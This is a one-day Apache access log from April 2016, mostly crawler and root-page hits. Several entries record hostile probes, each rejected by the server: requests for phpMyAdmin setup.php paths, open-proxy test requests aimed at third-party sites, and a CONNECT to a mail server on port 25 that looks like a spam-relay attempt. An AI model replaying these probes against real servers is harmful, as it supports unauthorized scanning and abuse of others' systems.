202.112.51.96 - - [18/Apr/2016:02:56:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
202.112.51.96 - - [18/Apr/2016:02:58:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
202.112.51.96 - - [18/Apr/2016:02:59:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
202.112.51.96 - - [18/Apr/2016:03:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.253.226.22 - - [18/Apr/2016:03:15:17 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
206.253.226.22 - - [18/Apr/2016:03:15:17 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
115.231.222.14 - - [18/Apr/2016:03:31:49 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.5628815737875406 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [18/Apr/2016:03:31:50 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7402859806127404 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [18/Apr/2016:03:31:50 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.5908618571873246 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
66.249.78.234 - - [18/Apr/2016:05:04:58 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.240 - - [18/Apr/2016:05:04:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
115.231.222.14 - - [18/Apr/2016:05:41:33 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2770104847618051 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [18/Apr/2016:05:41:33 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3561319389592365 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [18/Apr/2016:05:41:45 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1795111735148197 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
123.59.59.52 - - [18/Apr/2016:07:47:04 +0200] "GET http://www.qyer.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
115.231.222.14 - - [18/Apr/2016:07:51:00 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1976050427492181 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
213.238.172.66 - - [18/Apr/2016:08:32:10 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
213.238.172.66 - - [18/Apr/2016:08:32:16 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
213.238.172.66 - - [18/Apr/2016:08:32:21 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
157.55.39.236 - - [18/Apr/2016:08:33:05 +0200] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.236 - - [18/Apr/2016:08:33:15 +0200] "GET /anfahrt.html HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.160 - - [18/Apr/2016:08:50:56 +0200] "GET /support.html HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.103.252.5 - - [18/Apr/2016:09:20:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
115.231.222.14 - - [18/Apr/2016:10:00:43 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7496887159886767 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
61.228.94.218 - - [18/Apr/2016:10:44:50 +0200] "CONNECT vip163mx00.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
66.240.192.138 - - [18/Apr/2016:11:46:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
66.240.192.138 - - [18/Apr/2016:11:46:05 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
66.240.192.138 - - [18/Apr/2016:11:46:05 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
115.231.222.14 - - [18/Apr/2016:12:10:19 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2508314618583484 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
69.30.202.226 - - [18/Apr/2016:13:02:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.30.226.101 - - [18/Apr/2016:13:07:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
185.103.252.5 - - [18/Apr/2016:13:12:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
